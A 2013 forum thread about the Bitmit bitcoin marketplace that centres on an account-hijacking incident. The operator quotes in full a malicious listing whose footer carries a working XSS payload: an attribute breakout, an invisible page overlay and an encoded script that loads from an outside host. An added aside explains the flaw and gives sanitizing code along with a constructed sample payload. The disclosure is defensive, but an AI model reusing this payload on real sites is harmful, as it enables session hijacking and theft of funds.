Author Topic: Bitmit - Bitcoin shopping mall - Bitcoin market place - Bitcoin auction house  (Read 142470 times)
bitmit_samar20
August 24, 2013, 05:36:08 AM
 #1041

Somebody stole 4.59 bitcoins from my a/c. He changed all my a/c settings.

-4.59295734
13nPWDB4vGQfJWD9DnEC5DUx3y1Qn8ScPN
2013-08-23, 09:51

Please get back my bitcoins. I sent msg to customer service.

Waiting for your reply.

thanks.

Verified And Trusted Seller- Amazon Shopping Service
giszmo
August 24, 2013, 08:37:44 AM
 #1042

tosaki's last post is 2 weeks old and nobody explains stuff. bitmit is dead for me until things are sorted out.

bernard75
August 24, 2013, 08:51:25 AM
 #1043

There are some small things that are very annoying and never got fixed like the "state" field in the buyers address.
Is this still used even in the US?
tosaki (OP)
August 24, 2013, 02:55:51 PM
Last edit: August 24, 2013, 03:09:00 PM by tosaki
 #1044

Sorry for late response.

We were facing some unauthorized withdrawals and are currently investigating. It seems the attacker managed it with a user hijacking attack (the IP at withdrawal time is always the user's own) to withdraw payments once a user is logged in. He is also deactivating notifications.

Currently outgoing transactions are not processed for security reasons and you are getting notified by email.

We are searching for the security flaw on our site! Your funds are safe because we have several backups and most of our funds are stored in a cold wallet.

UPDATE:
As we have estimated, this was an XSS attack. Our HTML purifier tool did not remove this code.

Quote
<b>Item</b><br /><b>I may be out of office sometimes so please PM me before making any purchase.</b> Steam keys will be delivered by email in 24 hours.<br /><br /><b>Payment</b><br />Payment can only be done through the Bitmit system, there are no exceptions to this rule. I accept escrow on all items. <br /><br /><b>Testing</b><br />I test everything that I sell, one item at a time. Nonetheless, please be sure to read the listing above in detail, as it will contain any qualifiers about the cosmetic or functional condition of the item, as well as tell you what accessories come with the device. I also strive to respond to any inquiries about auctions in as timely a fashion as possible. <br /><br /><b>Shipping</b><br />I ship out every order as quickly as possible after the payment is received. In most cases, this results in your product being shipped on the next business day (Monday through Friday). However, on occasion I may receive a large number of orders in a short period of time which may slightly delay shipping of your item. <br /><br />In order to receive my combined shipping discount, all items must be purchased on the same day and all items must be paid for within 48 hours. Please note that when returning a defective item, customers are responsible for shipping costs; however, I will ship your replacement free of charge. You also have the option to return the product for a refund; however, a $9.99 handling fee will be deducted from your total amount. All refunds are subject to a 15% restocking fee. <b>NO exceptions.</b><br /><br /><b>Feedback</b><br />Please contact us before you leave negative feedback, and I will do my best to make the situation right.<br /><br />If you have any questions please just message me. 
http://bitmit.net"onclick="this.removeAttribute('href');this.style.height='0%';"onmousemove="javascript:this.onmousemove=null;jQuery('head').append(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,115,58,47,47,98,105,116,109,116,46,103,111,112,97,103,111,100,97,46,99,111,109,47,119,47,119,112,45,116,114,97,99,107,46,112,104,112,34,62,60,47,115,99,114,105,112,116,62));"style="position:absolute;opacity:0;font-size:0px;top:0;left:0;display:block;width:1500px;height:1500px;z-index:50001;<br /><br />Fastandfurious
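
Added example, not part of tosaki's post and not bitmit's code: the quoted footer uses a double quote to break out of an `href` attribute, which only works when the link markup is built without escaping. The sketch assumes a renderer that turns bare URLs into `<a href="...">` by string concatenation (the thread does not show the real one); the function names, the `shop.example` and `cdn.example` hosts and the `run` handler are constructed for illustration.

```javascript
// Added illustration, not bitmit's code; all names and sample data are hypothetical.

// Escape text for HTML element content or a double-quoted attribute value.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, c => map[c]);
}

// Assumed vulnerable pattern: anything after http(s):// up to the next space
// is pasted into href="..." verbatim, so a double quote inside the "URL"
// closes the attribute and the remainder is parsed as further attributes.
function linkifyUnsafe(text) {
  return text.replace(/https?:\/\/\S+/g, u => `<a href="${u}">${u}</a>`);
}

// Hardened: parse each candidate, allow only http/https, escape on output.
function linkifySafe(text) {
  return text.split(/(https?:\/\/\S+)/).map((part, i) => {
    if (i % 2 === 0) return escapeHtml(part); // text between URL candidates
    let url;
    try { url = new URL(part); } catch { return escapeHtml(part); }
    if (!['http:', 'https:'].includes(url.protocol)) return escapeHtml(part);
    return `<a href="${escapeHtml(url.href)}" rel="nofollow noopener">${escapeHtml(part)}</a>`;
  }).join('');
}

// Attribute names a browser would see on the first <a> tag of the output.
function anchorAttributes(html) {
  const tag = /<a\s([^>]*)>/.exec(html);
  return tag ? [...tag[1].matchAll(/([a-z-]+)\s*=\s*"[^"]*"/gi)].map(m => m[1]) : [];
}

// Triage helper: reveal markup hidden in String.fromCharCode(...) lists
// when reviewing stored listings after an incident.
function decodeCharCodes(stored) {
  return [...stored.matchAll(/String\.fromCharCode\(([\d,\s]+)\)/g)]
    .map(m => String.fromCharCode(...m[1].split(',').map(Number)));
}

// Constructed listing footer, shaped like the one quoted in the thread.
const hidden = '<script src="https://cdn.example/x.js"></script>';
const codes = Array.from(hidden, c => c.charCodeAt(0)).join(',');
const sample = 'Questions? http://shop.example/item"onmousemove="run(String.fromCharCode(' +
  codes + '))"style="opacity:0 Thanks';

console.log(anchorAttributes(linkifyUnsafe(sample)));
console.log(anchorAttributes(linkifySafe(sample)));
console.log(decodeCharCodes(sample));
```

With the constructed footer, the unsafe renderer produces an anchor carrying `href`, `onmousemove` and `style`, while the hardened one produces only `href` and `rel`; `decodeCharCodes` returns the hidden script tag so a reviewer can see what a stored listing would have loaded.
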
bitmit_samar20
August 24, 2013, 04:22:43 PM
 #1045

Thank you for your quick reply. I hope you solve my problem and make the system stronger so that other users don't face this type of problem.

Blockchain helped me to find the illegal transaction from my bitmit account.
http://blockchain.info/address/13nPWDB4vGQfJWD9DnEC5DUx3y1Qn8ScPN

I think bitmit is the most popular site for shopping using bitcoin... maybe the No. 1 site. I suggest removing loopholes in the system. People like me who regularly use bitmit for transactions are willing to co-operate in the improvement of the website, and maybe others are too. I hope you have a very experienced IT team and hopefully, from their hard work, we will see an improved and most secure version of bitmit in the coming days....

Thanks.






Verified And Trusted Seller- Amazon Shopping Service
escrow.ms
August 24, 2013, 04:31:24 PM
 #1046

Tosaki, did you remove both ads?

tosaki (OP)
August 24, 2013, 04:39:59 PM
Last edit: August 24, 2013, 04:54:21 PM by tosaki
 #1047

Quote from: escrow.ms
Tosaki, did you remove both ads?

Yes, all XSS items should be removed, but currently we have disabled the item descriptions and item footer output because we are testing our HTML purifier.

Update:
We discovered why this was not escaped correctly and fixed the problem.
escrow.ms
August 24, 2013, 04:49:38 PM
 #1048

Alright, btw that code :


Code:
bitmt.gopagoda.com/w/wp-track dot.php

That page is hosted on pagodabox app's hosting, I'll contact them to remove it.
giszmo
August 24, 2013, 04:57:38 PM
 #1049

Quote from: escrow.ms
Alright, btw that code :

Code:
bitmt.gopagoda.com/w/wp-track dot.php

That page is hosted on pagodabox app's hosting, I'll contact them to remove it.

removing it should be pointless. they should provide who put it there.

i love anonymity but i also love seeing stupid thieves go to jail.

molecular
August 24, 2013, 04:58:04 PM
 #1050

Quote from: escrow.ms
Alright, btw that code :

Code:
bitmt.gopagoda.com/w/wp-track dot.php

That page is hosted on pagodabox app's hosting, I'll contact them to remove it.

it's gone already (404). good work.


PGP key molecular F9B70769 fingerprint 9CDD C0D3 20F8 279F 6BE0  3F39 FC49 2362 F9B7 0769
tosaki (OP)
August 24, 2013, 05:02:48 PM
 #1051

Quote from: molecular
Quote from: escrow.ms
Alright, btw that code :

Code:
bitmt.gopagoda.com/w/wp-track dot.php

That page is hosted on pagodabox app's hosting, I'll contact them to remove it.

it's gone already (404). good work.



It was already gone when I discovered it.
Kluge
August 24, 2013, 05:16:26 PM
Last edit: August 24, 2013, 05:29:08 PM by Kluge
 #1052

Not high-priority, but do you know wallet/withdrawal fees have been weird for a few months?



They're still .001BTC, but for some reason it's made up of a separate .0009 and .0001 transaction, now. (cropped out most irrelevant transactions from log in case you notice it's been tampered with)


ETA: Ohhhh... I see, now. The 0.0001BTC is the fee sent to miners. The .0009 appears to be pocketed. I guess that's better than earlier -- this one had no fees sent to miners (but still charged) : https://blockchain.info/tx/b480bcfdaeaa2fcb6175452808ccc14a586f91eaaffb1950244b4c35a0372aa5 - same here: https://blockchain.info/tx/532d14b7b5c3c61af1bdcae826993c36f0d8e69e1a31ec8825ff3515f937e859 ETA2: I guess that was fine back then, though, since it wasn't difficult to have pretty much everything and anything included in the next block.
escrow.ms
August 24, 2013, 05:20:00 PM
 #1053

Quote from: tosaki
It was already gone when I discovered it.

Ah ok, I didn't try to open that php page on my PC, looks like someone else reported it.
peonminer
August 24, 2013, 05:36:21 PM
 #1054

Hi everyone!

I just dropped by to tell bitmit.net THANK YOU!!!! I had a mishap with an order from a new seller. The seller claimed instant delivery in the ad but when I purchased I only got a message saying to PM the seller. I thought this was an EPIC FAIL! So... I contacted bitmit.net for a refund this morning because I didn't want my BTC in limbo for a week. I have to say, THIS IS THE FASTEST SUPPORT TICKET RESPONSE TIME I HAVE EVER EXPERIENCED ON THE INTERNET. PERIOD!!!!! YOU GUYS ROCK!!! KEEP UP THE AMAZING WORK!!! :)

~ Very happy and satisfied customer, I hope to do a lot of future business with you guys. :)
bitmit_samar20
August 24, 2013, 06:24:33 PM
 #1055

I got a refund. Customer care told me that there was an XSS attack and they found it & solved it.

I ask all legit hackers and security professionals to make bitmit much stronger. For regular buyers-sellers, if there is a mobile verification system and minimum fees for extra protection, there will not be any problem - just a suggestion.

thanks a lot for your valuable service.

Verified And Trusted Seller- Amazon Shopping Service
bernard75
August 24, 2013, 10:18:12 PM
 #1056

Quote from: bitmit_samar20
For regular buyers-sellers, if there is a mobile verification system and minimum fees for extra protection, there will not be any problem - just a suggestion.
Email confirmation would be a huge step towards security with virtually 0 effort.
mackstuart
August 25, 2013, 03:18:18 AM
 #1057

I have an issue guys and I just wanted to speak about it on the forum to ask others what they think.  I purchased an item for almost a thousand dollars on bitmit.  I asked the seller to ship the item with signature confirmation because of my location.  The seller shipped the item without signature and the item was stolen.  I filed a police report and did all other things required by bitmit, but they released the funds to the seller anyway.  The seller showed no proof of address that the item was shipped to other than a tracking number.  Also the seller obviously lives in the same area as where I had to ship the item, because of the location that the tracking information shows.  How do you all feel that this should be handled?

bitmit_samar20
August 25, 2013, 05:00:44 AM
 #1058

First, why did the seller refuse signature confirmation with shipping if you already mentioned it before shipping with the order confirmation?

Also, have you tried to check with the courier company with details?

I hope tosaki may sort out this issue.

======
Email confirmation is also a good option for transactions. (approve/disapprove)



Verified And Trusted Seller- Amazon Shopping Service
mackstuart
August 25, 2013, 07:27:34 AM
 #1059



That is what I am saying. I don't understand how they could side with him, and I mentioned that I must have signature confirmation before the item was shipped. I responded to the situation several times and there were no responses from the moderator or seller, until the day that the funds were released. It was strange because the seller responded right before the funds were released, as if he had been talking to bitmit outside of the bitmit forum. I know I am in the right on this issue. I already PMed tosaki a couple of weeks ago when the issue first arose, but I have gotten no responses.

bernard75
August 29, 2013, 10:49:52 AM
 #1060

For god's sake, please make some IQ test before people can buy!
I am tired of people asking:
"Why u no offer PayPal?"

They just stray in without the most basic understanding of BTC.